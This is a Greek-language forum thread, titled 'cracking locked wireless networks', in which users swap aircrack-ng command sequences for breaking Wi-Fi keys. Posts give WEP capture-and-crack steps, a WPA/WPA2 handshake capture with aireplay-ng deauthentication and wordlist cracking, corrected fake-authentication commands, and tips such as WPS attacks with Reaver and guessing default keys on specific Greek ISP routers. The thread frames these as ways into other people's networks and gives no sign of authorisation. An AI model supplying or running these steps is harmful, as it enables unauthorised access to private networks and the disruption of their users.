Προς το περιεχόμενο

"Σπάζοντας" κλειδωμένα ασύρματα δίκτυα


drkameleon

Προτεινόμενες αναρτήσεις

  • Απαντ. 2,4k
  • Δημ.
  • Τελ. απάντηση

Συχνή συμμετοχή στο θέμα

wpa..

μπορεις αν εχει ''on'' το wps...γενικα σε δικτυα με wpa/wpa2 αν δεν δημιουργηθει καποια λιστα  με τα ελληνικα δεδομενα στα passphrases κτλ δεν προκειται να βγαλεις ακρη...οτι λιστα κυκλοφορει ειναι για router του εξωτερικου...αυτο το λινκ ειναι ενας τροπος αν λειτουργει το wps παντα ξαναλεω....

 

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Χωρίς να το έχω ψάξει πάρα πολύ, το έχω ψάξει, όμως, μόνος μου, απλά καταφεύγω και ρωτάω και εσάς. Υπάρχει κανένα wordlist για Wind δίκτυα με WPA-PSK προστασία?

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Χωρίς να το έχω ψάξει πάρα πολύ, το έχω ψάξει, όμως, μόνος μου, απλά καταφεύγω και ρωτάω και εσάς. Υπάρχει κανένα wordlist για Wind δίκτυα με WPA-PSK προστασία?

μπα απ'οσο ξερω οχι...μπορεις βεβαια να τσεκαρεις/googlareis το amigdalo   http://amigdalo.ath.cx/ST/

 

 ...η αυτο το site που το ανεφερε καποιος πιο παλια σ'αυτο το θεμα  http://nasos.gr/nf/

 

αυτος ο τροπος ισχυει για wep 100%     

 

 
 ifconfig wlan0
 
 iwconfig wlan0
 
 airmon-ng start (your interface)
 
 iwconfig 
 
 airodump-ng mon0 
 
 airodump-ng mon0 --bssid (Mac Address) -c (channel no.) -w (filename)
 
 .....μολις μαζεψει απο 70000data και μετα το σταματας με ctrl+c
 
 aircrack-ng (file name) πχ WEPkey-01.cap
 
 
...........και για wpa/wpa2 με wordlist
 
 
airmon-ng
 
airmon-ng start wlan0
 
clear
 
airodump-ng mon0
 
airodump-ng -w WPACap -c (opoio kanali einai) mon0
 
''NEW CONSOLE''
 
aireplay-ng -0 0 -a (router mac) -c (client mac) mon0
 
''NEW CONSOLE''
 
aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst WPACap-01.cap
 
                      '''PARADEIGMA PROORISMOU'''

 

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Αν θυμάμαι καλά τα περισσότερα Wind είναι ZTE οπότε δε νομίζω να βοηθήσουν τα παραπάνω. Δοκίμασε να βάλεις pass την mac με μικρά ή αλλιώς τσέκαρε αν έχει WPS. Όσες φορές είχα πετύχει Wind ήταν on.

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Αν θυμάμαι καλά τα περισσότερα Wind είναι ZTE οπότε δε νομίζω να βοηθήσουν τα παραπάνω. Δοκίμασε να βάλεις pass την mac με μικρά ή αλλιώς τσέκαρε αν έχει WPS. Όσες φορές είχα πετύχει Wind ήταν on.

ναι εχεις δικιο απλα του τα εδωσα μηπως τα χρησιμοποιησει για αλλα δικτυα...hol,cyta...και αλλα

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

 

μπα απ'οσο ξερω οχι...μπορεις βεβαια να τσεκαρεις/googlareis το amigdalo   http://amigdalo.ath.cx/ST/

 

 ...η αυτο το site που το ανεφερε καποιος πιο παλια σ'αυτο το θεμα  http://nasos.gr/nf/

 

αυτος ο τροπος ισχυει για wep 100%     

 

 
 ifconfig wlan0
 
 iwconfig wlan0
 
 airmon-ng start (your interface)
 
 iwconfig 
 
 airodump-ng mon0 
 
 airodump-ng mon0 --bssid (Mac Address) -c (channel no.) -w (filename)
 
 .....μολις μαζεψει απο 70000data και μετα το σταματας με ctrl+c
 
 aircrack-ng (file name) πχ WEPkey-01.cap
 
 
...........και για wpa/wpa2 με wordlist
 
 
airmon-ng
 
airmon-ng start wlan0
 
clear
 
airodump-ng mon0
 
airodump-ng -w WPACap -c (opoio kanali einai) mon0
 
''NEW CONSOLE''
 
aireplay-ng -0 0 -a (router mac) -c (client mac) mon0
 
''NEW CONSOLE''
 
aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst WPACap-01.cap
 
                      '''PARADEIGMA PROORISMOU'''

 

 

 

Ο κώδικας για το WEP που έγραψες δουλεύει μονο άμα υπάρχει κίνηση από clients στο WiFi αφού δεν εχεις commands που θα κάνουν injection άρα δεν δουλεύει 100% αφού η διαδικασία είναι μιση.

 

Επίσης το Aircrack το τρέχεις παράλληλα με το airodump και το aircrack κάνει refresh μονο του δεν χρειάζονται 70000 ηώς οπωσδήποτε, το aircrack κάνοντας refresh τεστάρει συνεχεια keys και θα βρει το key μονο με όσα ηώς χρειάζονται δεν χρειάζεται να περιμένεις για 70000

 

 

 

Tώρα το wpa με wordlist είναι δύσκολο γιατι με τα greeklish το dictionary δυσκολεύει αφού για την ίδια λέξη υπάρχουν ένα σορό διαφορετικά syntax. O μονος τρόπος για να κανεις κάτι με WPA  είναι το Reaver

  • Like 2
Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Ο κώδικας για το WEP που έγραψες δουλεύει μονο άμα υπάρχει κίνηση από clients στο WiFi αφού δεν εχεις commands που θα κάνουν injection άρα δεν δουλεύει 100% αφού η διαδικασία είναι μιση.

 

Επίσης το Aircrack το τρέχεις παράλληλα με το airodump και το aircrack κάνει refresh μονο του δεν χρειάζονται 70000 ηώς οπωσδήποτε, το aircrack κάνοντας refresh τεστάρει συνεχεια keys και θα βρει το key μονο με όσα ηώς χρειάζονται δεν χρειάζεται να περιμένεις για 70000

 

 

 

Tώρα το wpa με wordlist είναι δύσκολο γιατι με τα greeklish το dictionary δυσκολεύει αφού για την ίδια λέξη υπάρχουν ένα σορό διαφορετικά syntax. O μονος τρόπος για να κανεις κάτι με WPA  είναι το Reaver

δεν χρειαζεται απαραιτητα packet injection να ξερεις...ειναι δοκιμασμενη τουλαχιστον σε 20 διαφορετικα routers...οσο για το wpa/wpa2 εχω εξηγησει παραπανω αυτο που λες για τις wordlists και καλυτερα θα ηταν να διαβαζεις απο την αρχη την συζητηση και οχι να απαντας κατευθειαν σε οποιον γραφει τελευταιος...φιλικα παντα

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Xωρίς injection θες connected clients πάνω για να μαζέψεις ivs και περιμένεις κάνοντας τίποτα να μαζέψεις packets. 
 
Θες packet injection για να για να κανεις speed up την διαδικασία και να μαζέψεις ivs σε μερικά λεπτά και χωρίς κανένα client πάνω. Πως αλλιώς θα βρείς το WEP  ενός ξεχασμένοu AP χωρίς κίνηση στο WiFi παρα μονο στο ethernet ???
 
Στις εντολές σου πρέπει να προσθέσεις Packet injection αλλιώς τα βήματα δεν είναι ολοκληρωμένα και προφανώς δεν δουλεύει 100% γιατί δεν εχεις πρόβλεψη τι κανεις άμα δεν έχει clients το WiFi που είναι target.

 

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

 

Xωρίς injection θες connected clients πάνω για να μαζέψεις ivs και περιμένεις κάνοντας τίποτα να μαζέψεις packets. 
 
Θες packet injection για να για να κανεις speed up την διαδικασία και να μαζέψεις ivs σε μερικά λεπτά και χωρίς κανένα client πάνω. Πως αλλιώς θα βρείς το WEP  ενός ξεχασμένοu AP χωρίς κίνηση στο WiFi παρα μονο στο ethernet ???
 
Στις εντολές σου πρέπει να προσθέσεις Packet injection αλλιώς τα βήματα δεν είναι ολοκληρωμένα και προφανώς δεν δουλεύει 100% γιατί δεν εχεις πρόβλεψη τι κανεις άμα δεν έχει clients το WiFi που είναι target.

 

πλακα-πλακα με aireplay-ng --fakeauth=0 -e ''ονομα bssid'' -a (την mac του router) wlan0 γινεται το accosiation....το δοκιμασα στο backtrack 5 αλλα μου εβγαλε οτι το router μπορει να ειναι απασχολημενο η οτι θελει καποιο kernel patch ενω στο παραδειγμα που το ειδα επιασε αμεσως η διαδικασια(ητανε σε kali-linux,λεω μηπως ειχε καποια διαφορα)...γιατι ετσι...???

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Το Fakeauth εκτος από source mac θέλει και destination mac δηλαδή θέλει και  -h  αλλιώς δεν δουλεύει σωστά.

Τα Penetration test θέλουν διάβασμα γιατί άμα ξέρεις περίπου τις εντολές δεν κανεις δουλειά. Ξανά κοίταξε λίγο τις εντολές σου να κάλυψης τα κενά στην θεωρία.

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Το Fakeauth εκτος από source mac θέλει και destination mac δηλαδή θέλει και  -h  αλλιώς δεν δουλεύει σωστά.

 

Τα Penetration test θέλουν διάβασμα γιατί άμα ξέρεις περίπου τις εντολές δεν κανεις δουλειά. Ξανά κοίταξε λίγο τις εντολές σου να κάλυψης τα κενά στην θεωρία.

ξερω οτι ζηταει -h απλα στην συγκεκριμενη φαση σαν -h τι ακριβως βαζω απο την στιγμη που χρησιμοποιω και τo mac και το bssid στην εντολη...δεν μενει κατι αλλο εκτος απο το station που το εμφανιζει οταν γινεται το προσωρινο association με την συσκευη...

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Η  εντολή θέλει source και destination mac source είναι το ΑP και destination το Laptop σου

αρα στην εντολη aireplay-ng --fakeauth=0 -e ''ονομα bssid'' -a (την mac του router) wlan0 τι συμπληρωμα θελει...???

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Tα εξηγώ αναλυτικό και αποτέλεσμα κανένα ppff, άντε να σε πάρω από το χεράκι:

 

 

aireplay-ng -1 0 -e <AP ΕSSID>  -b < AP BSSID> -h <Mac mon0> mon0

 

 

και προφανώς πρέπει να είσαι στο ίδιο κανάλι με το ΑP για να δουλέψει η εντολή.

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Επισκέπτης
Αυτό το θέμα είναι πλέον κλειστό για περαιτέρω απαντήσεις.

  • Δημιουργία νέου...